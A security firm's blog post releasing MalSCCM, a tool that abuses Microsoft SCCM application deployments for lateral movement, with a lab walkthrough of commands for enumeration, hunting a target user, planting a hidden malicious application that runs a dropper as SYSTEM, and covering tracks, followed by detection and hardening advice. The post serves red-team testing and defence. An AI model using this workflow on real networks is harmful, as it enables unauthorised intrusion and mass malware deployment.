During red team operations the goal is often to compromise a system of high value. These systems will ideally be segmented from the wider network and locked down to prevent compromise. However, the organisation still needs to be able to manage these devices in scalable and reliable ways, such as being able to deploy patches or scripts for administration. Enter Microsoft System Centre Configuration Manager (SCCM).
Download MalSCCM
Today, we have released MalSCCM, which takes some of the functionality of PowerSCCM and enhances some usage aspects, making it more appropriate for Command and Control usage.
We will be presenting a talk that covers two new tools, including this one, at Black Hat Asia on May 13th @ 10:15 SGT. You can download MalSCCM from the repository below.
GitHub: https://github.com/nettitude/MalSCCM
Read on for more information about how MalSCCM can be used to laterally move and act on objectives.
SCCM Introduction
SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation. SCCM allows for a great deal of functionality, including pushing PowerShell scripts to its clients, pushing commands to its clients, opening remote terminal sessions on clients, installing software on its clients, altering policies on its clients and more.
This range of functionality makes it an ideal target for attackers that want to laterally move within an environment whilst blending in with normal activity. To compromise SCCM it is necessary to understand the different ways SCCM can be deployed within an environment.
SCCM Architecture
SCCM can be deployed in a number of ways to be ideal for the target environment, however there is some common terminology:
- Central Administration Site – When there are multiple Primary Sites (environments) this will be the one central location that management is performed from and will be passed down to each relevant Primary Site. Installation of a Central Administration Site can only be done for large environments with more than 100,000 clients.
- Primary Site – These are the main management points for each environment. Unless a Central Administration Site is within the environment, this will be the point where all management is performed and pushed out.
- Secondary Site – These sites are children of Primary Sites and are managed by the Primary Site, however they have their own SQL databases, and they aid with establishing connections between endpoint clients and the Primary Site.
- Distribution Point – These are the servers that actually deliver the contents of the updates to the endpoint clients. Each Distribution Point supports up to 4,000 clients, and by default both Primary Sites and Secondary Sites are also a Distribution Point.
With this range of roles within SCCM, there are a large number of configurations for how any given endpoint may be retrieving updates. A visual representation of a possible hierarchy is below:
The image above is from http://sms-hints-tricks.blogspot.com/2012/06/hiearchy-simplification-and-secondarys.html.
The simplest configuration is a Primary Site which has no children Secondary Sites and the Primary Site acts as the Distribution Point itself. This allows SCCM to be deployed and used in the environment with only one server, which is performing all of the roles and can support up to 4,000 clients.
A more robust deployment would be a Primary Site that is segmented from the corporate network which can only talk to Secondary Sites. These Secondary Sites would also be segmented in various parts of the network for various environments. These Secondary Sites would then communicate with Distribution Points on the network which in turn will communicate with the endpoints.
Through either of these deployment styles, if the Primary Site can be compromised, then it offers a great advantage to attackers for widespread command execution. This could be used to proliferate ransomware at scale through an environment, or it could be used to target specific machines and laterally move to them in a variety of ways.
MalSCCM
Tooling for red teams and attackers has long since shifted to .NET, however there are very few tools publicly available for abusing SCCM, making it an attack path that may not be explored as much.
For PowerShell there is PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) which is great, however using it through C2 introduces a lot of Indicators of Compromise (IoC) for running PowerShell, which may not be appropriate depending on the target’s defence.
With the release of this blog post, Nettitude has released MalSCCM (https://github.com/nettitude/MalSCCM) which takes a subset of the functionality of PowerSCCM and enhances some usage aspects, making it more apt for C2 usage.
As this is the first release of MalSCCM, it currently only enables the abuse of application deployments for lateral movement through SCCM, however this seems to be a reliable method for lateral movement. The functionality included within MalSCCM may increase over time as more attack paths are explored.
MalSCCM – Understanding the deployment
The first hurdle of targeting SCCM is understanding how SCCM is deployed in the environment and which servers to target.
Assuming this is a red team scenario, the first machine compromised is likely an employee’s machine. Whilst on the machine it is worth looking out for processes that indicate the machine is managed by SCCM such as CcmExec.
These processes are present on any machine that is an SCCM client, whether it’s a server or a workstation. If the machine is managed by SCCM then it needs to know where its Distribution Point is. This is a value held in the registry and can be read through the following command: MalSCCM.exe locate
.
The locate
command will tell you what the SiteCode of the SCCM deployment is (used by SCCM to differentiate Primary Sites) as well as the Distribution Point for the machine. From the endpoint client it is not possible to tell at this point whether the Distribution Point is also the Primary Site, however it may be possible to tell through LDAP looking at naming conventions or descriptions of the server.
Within a red team scenario, it would then be necessary to compromise the environment to a point where you can compromise that Distribution Point. This could for example be compromising a user that is an SCCM administrator or it could be compromising infrastructure administrators, LAPS etc.
If you wanted to assess whether the Distribution Point was also the Primary Site and you didn’t want to get a C2 implant on the server, you could enumerate this through MalSCCM by trying a command such as below:
MalSCCM.exe inspect /server:<DistributionPoint Server FQDN> /groups
If you run this command as an administrator of the Distribution Point server, then this will connect over WMI and attempt to enumerate the local databases. If this returns group information, then the Distribution Point is also the Primary Site.
In this scenario you could then do all of the SCCM exploitation remotely through MalSCCM by using the /server
flag on all commands. This allows you to deploy malicious applications and laterally move without ever getting C2 on the SCCM server itself.
If the remote inspect fails or you want confirmation of the server role, then you could compromise the Distribution Point and run the locate
command again on the server:
MalSCCM.exe locate
The Distribution Point will have more registry keys of interest than an endpoint client. When running locate on a Distribution Point it will tell you where it is getting its updates from, which is usually the Primary Site.
There are multiple registry keys enumerated because the first registry key is not present if you run the command on a Primary Site itself (if it utilises secondary sites).
This tool has not been tested on an environment with Secondary Sites configured, however it is likely that the Distribution Point would return the location of the Secondary Site, and that server would then need to be compromised to find the Primary Site in the same way.
MalSCCM Enumeration
Once the Primary Site is found, it is possible to use the inspect command within MalSCCM to gather information about the SCCM deployment through various WMI classes used by SCCM. As the information returned can be very large, the inspect
command has been split into modules.
The modules at release are listed below:
- Computers – This will return all the computers managed through SCCM. This command will return just the computer name to reduce the output.
- Groups – This will return all of the SCCM groups. Computers in SCCM can be combined into Groups for pushing applications out, so for example you may have a group for all computers, all application servers, etc. MalSCCM will return the group names and the number of members.
- PrimaryUser – Within SCCM its possible to have a setting allowed which allows SCCM to track which users are using which machines and create an affiliation between them. Using this can be possible to hunt for specific users in the environment, which is very useful.
- Forest – This will tell you the SCCM forest name.
- Packages – This will enumerate the SCCM packages currently listed.
- Applications – This will return the SCCM applications currently listed within SCCM.
- Deployments – This will return the SCCM deployments within SCCM.
If you want to gather all information you can run the command:
MalSCCM.exe inspect /all /server:<PrimarySiteFQDN>
This will return all of the above information. These commands are useful for understanding various aspects of SCCM before, during and after exploitation.
Abusing SCCM for Lateral Movement
MalSCCM can be used for lateral movement through malicious SCCM applications.
Since SCCM works with the concepts of groups rather than individual machines for deployments, the best way to target an individual machine is to create a new SCCM group which blends in with the existing ones, then adding the target machine into that group. This allows the malicious application to be applied only to the target machine and allows for cleaning up after the attack.
The workflow of the attack is as follows:
- Compromise a Primary Site.
- Enumerate the Primary Site to understand which machines to target.
- Create a new group that blends in with the current groups.
- Add the target machine to the new group.
- Create a malicious application.
- Deploy the application to the group containing the target.
- Force the target group to check in with SCCM.
- Once laterally moved, clean up the deployment and application.
- Delete the target group.
The functionality for all steps of the above process is within MalSCCM, allowing you to perform this chain through C2 conveniently.
To demonstrate this attack chain, the Primary Site of the lab has been compromised. To keep command lines small and screenshots readable, the C2 will be deployed on the Primary Site itself and is running with high integrity.
The computers will be enumerated to check which targets are possible through SCCM:
MalSCCM.exe inspect /computers
If a user was being hunted instead of a specific machine, then it may be possible to enumerate the user’s location through SCCM. Within SCCM there is an optional feature called User Device Affinity. If User Device Affinity is enabled SCCM will track the logon sessions within each client and if a login session exceeds a configured amount of time, then it will affiliate that user with that computer. This affiliation will be kept within the SCCM database and can be used by SCCM to send applications out to users by knowing which machines they are assigned to. The users affiliated with a machine are the Primary Users for that machine. There can be multiple per machine.
The affiliated Primary Users will be enumerated to determine if we can hunt for specific users:
MalSCCM.exe inspect /primaryusers
The groups will be enumerated to determine the current group names:
MalSCCM.exe inspect /groups
For this demonstration the goal would be to compromise the user Ben. From the Primary Users we can tell that this user often uses the machine WIN2016-SQL. This machine is managed through SCCM so we will deploy a malicious application to laterally move to the machine.
A new group will be created that blends in with the environment. Groups can either be user groups or computer groups within SCCM, so MalSCCM will allow you to create either. If you create a user group and add the target user, then SCCM will use the Primary User affiliations discussed previously to determine which machine it should deploy the application too. This could result in the same end goal but to manage risk and ensure the right machines are being compromised, the preference is creating a computer group.
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
With the computer group created it should be listed through inspect.
MalSCCM.exe inspect /groups
With the group made, the target computer is added to the group. Note that if you try to use adduser
instead of addhost
to add a device into a device group, it will break that group and prevent deletion, so make sure you are using the right command for the resource you are adding.
MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL
This is then inspected to ensure the user count increased in the group.
MalSCCM.exe inspect /groups
This group can also be seen in the SCCM console.
A malicious application then needs to be made. For MalSCCM the malicious application will just point to a UNC path to the application to run as SYSTEM. The simplest case would be to upload a malicious EXE and use that. Since the target endpoint will run this as SYSTEM, it’s important that the malicious EXE is placed in a share that is accessible by the target computer account rather than the user.
In this case a simple dropper EXE will be uploaded to a share. When SCCM is installed, a share is exposed on Distribution Points called SCCMContentLib$. This share is readable by all users, and would be utilised by SCCM, making it an ideal place for the malicious binary.
The malicious application will then be made pointing to the malicious EXE.
MalSCCM.exe app /create /name:demoapp /uncpath:”\\BLORE-SCCM\SCCMContentLib$\localthread.exe”
Inspect can be used to check that the application now exists.
MalSCCM.exe inspect /applications
This application will be hidden from the SCCM administrative console when created through MalSCCM, which is a useful feature however it is a noteworthy detection opportunity, since most legitimate applications would not be hidden.
With the application made, it then needs to be deployed. MalSCCM can be used to create a deployment for the target group.
MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment
Inspect can be used to ensure the deployment was created.
MalSCCM.exe inspect /deployments
This will return the deployment and the application that will be deployed with it. It should be noted that even though the application can be hidden from the SCCM console, the deployment can not be.
Within the deployment the application name can be seen, and there will be a link for related objects.
If you click on that application link, it will show you the malicious application.
However, if you were to click out of this menu and back into applications, the application will not be found.
This is an interesting case for administrators or investigators trying to determine if SCCM has been abused. Hidden applications such as these could also be found through PowerShell for investigation, discussed more at the end of this blog post.
With the deployment made, it is possible to use MalSCCM to attempt to make the target group check in.
MalSCCM.exe checkin /groupname:TargetGroup
This can take time for a natural check in, however assuming the clients are online and connected, the check in should happen fairly quickly (within the lab this had a range of immediate to a few minutes). In this demo the time difference between the checkin command being issued and the implant coming back was just under 30 seconds.
After the application executed our EXE a new PoshC2 implant arrived!
It can be seen that the process name of the implant is localthread as that was the binary name for our dropper. It is also running as SYSTEM as expected.
The parent process of this is WmiPrvSE.exe, which is normal for activities happening through WMI connections. If SCCM abuse is suspected, then indicators of WMI activity may be useful to collect.
At this point the binary on the share is able to be deleted, suggesting that the binary being used on the target has been copied locally as binaries in use cannot be removed. Searching for it locally on the machine returned the following locations on disk on the target:
- C:\Windows\Prefetch\LOCALTHREAD.exe-9A0EB550.pf
This prefetch file could be analysed using a tool such as PECmd (https://ericzimmerman.github.io/#!index.md), which would allow visibility of the modules loaded by the process.
Cleanup
Since lateral movement was successful, clean-up is performed. MalSCCM has a clean-up function that will attempt to look for deployments of the application and remove them.
MalSCCM.exe app /cleanup /name:demoapp
If multiple deployments have been performed with the same application, then this command should be run multiple times until there are the deployments and applications are removed. In this instance it was executed only once since there was only one deployment.
MalSCCM.exe inspect /deployments
MalSCCM.exe inspect /applications
With the application cleared, the target group can be deleted, reverting SCCM back to its original configuration.
MalSCCM.exe group /delete /groupname:TargetGroup
Checking with inspect to ensure the group is removed.
MalSCCM.exe inspect /groups
Attack Recap
To recap the attack path and usage of MalSCCM, the steps were as follows:
- Locate the Primary Site using
MalSCCM.exe locate
on a Distribution Point. - Enumerate the Primary Site using
MalSCCM.exe inspect /all
. - Create a new group using
MalSCCM.exe group /create /groupname:<> /grouptype:device
. - Add the target machine to the group using
MalSCCM.exe group /addhost /groupname:<> /host:<>
. - Upload a malicious binary to a share readable by Domain Computers.
- Create a malicious application pointing to your binary using
MalSCCM.exe app /create /name:<> /uncpath:<>
. - Deploy the malicious application to the group containing your target using
MalSCCM.exe app /deploy /name:<> /groupname:<> /assignmentname:<>
. - Make the target check in to SCCM for an update using
MalSCCM.exe checkin /groupname:<>
. - Clean-up tracks using
MalSCCM.exe app /cleanup /name:<>
. - Clean-up the group using
MalSCCM.exe group /delete /groupname:<>
.
Protecting against SCCM Abuse
For defence teams looking to defend against this type of lateral movement the key item would be good segmentation. If an attacker can already compromise your SCCM Primary Site then they are likely already in a very privileged position within the network, and SCCM may be a target used for mass ransomware or accessing specific targets that may be well segmented in other areas.
The common architecture for SCCM relies on fewer servers and ease of access across a wide environment, however setting up SCCM with a more segmented hierarchy forces attackers to make more hops in the network before reaching the Primary Site, which provides a greater chance of detection.
An idea for segmentation would be having a Primary Site that is only accessible on the network from Secondary Sites or Distribution Points on the ports necessary for SCCM functionality. Then having the Secondary Sites/Distribution points on the network segments necessary to talk to the clients, but only exposing the ports needed for SCCM. This could then be scaled to environment size, but with the same isolated design.
Administration of SCCM could then be done through Privileged Access Workstations (PAWs) with appropriate access measures. This would lock down the SCCM servers, making the jumps necessary to compromise SCCM less attractive for attackers.
Once on the SCCM server, the WMI utilities leveraged are all normal actions exposed in the SCCM console. However, there are some actions that could maybe be points for detection:
- New SCCM groups being created with only few members,
- Applications being created that are hidden (these could be enumerated through WMI and alerted on for any application with the hidden flag set),
- Deployments being pushed to standard groups such as All Computers,
- Locking down unsigned executables being executed on the endpoints.
PowerShell Investigation
PowerShell can be used to investigate SCCM deployments, so some useful commands are being shared here to aid defenders. These commands are all executed on the SCCM Primary Site.
To use PowerShell with SCCM you will need to first locate the site code. This can be done through the following command:
Get-WmiObject -Namespace “root\ccm” -Query “Select Name FROM SMS_Authority”
This will return SMS:<SiteCode>. This SiteCode can then be used in further WMI queries for SCCM. In this case the SiteCode is LON, so we would replace <SiteCode> in the future commands with LON.
To list all groups the following command can be used:
Get-WmiObject -Namespace "root\sms\site_<SiteCode>" -Query "Select Name,MemberCount,Comment FROM SMS_Collection"
This will return the group names, the member counts and the comment. When MalSCCM creates a group, it will do it with no comment, which may be unusual on the environment depending on the SCCM administrator’s workflow.
To list all applications and whether they are hidden or not, the following command could be used:
Get-WmiObject -Namespace "root\sms\site_<SiteCode>" -Query "Select LocalizedDisplayName, IsHidden FROM SMS_APPLICATION"
This returned Test which is a legitimate application created in the SCCM console and is not hidden. It also returned demoapp created through MalSCCM which is hidden.
To get a list of deployments the following command could be used:
Get-WmiObject -Namespace "root\sms\site_<SiteCode>" -Query "Select AssignmentName,ApplicationName,CollectionName,Enabled FROM SMS_ApplicationAssignment"
Through all of these queries, it would be possible to return all attributes with SELECT * … instead of named attributes to then review where differences occur with the normal process surrounding SCCM.
PowerSCCM includes more cmdlets that may be useful for investigation purposes as well.
Conclusion
SCCM is a powerful tool for administrators and can be a useful tool as well for attackers. This blog post isn’t to suggest that there is a weakness within SCCM, only that deployments of SCCM frequently are permissive, with singular SCCM instances managing all the clients. This makes it an attractive target within engagements where server administrative privileges may be achieved but directions towards the target are unclear. The release of MalSCCM aims to shed some light on the risks of this attack path so that SCCM deployments are made with security in mind. Care should be taken when exploiting SCCM for lateral movement to ensure that only the targeted machines are compromised where authorisation has been provided to do so.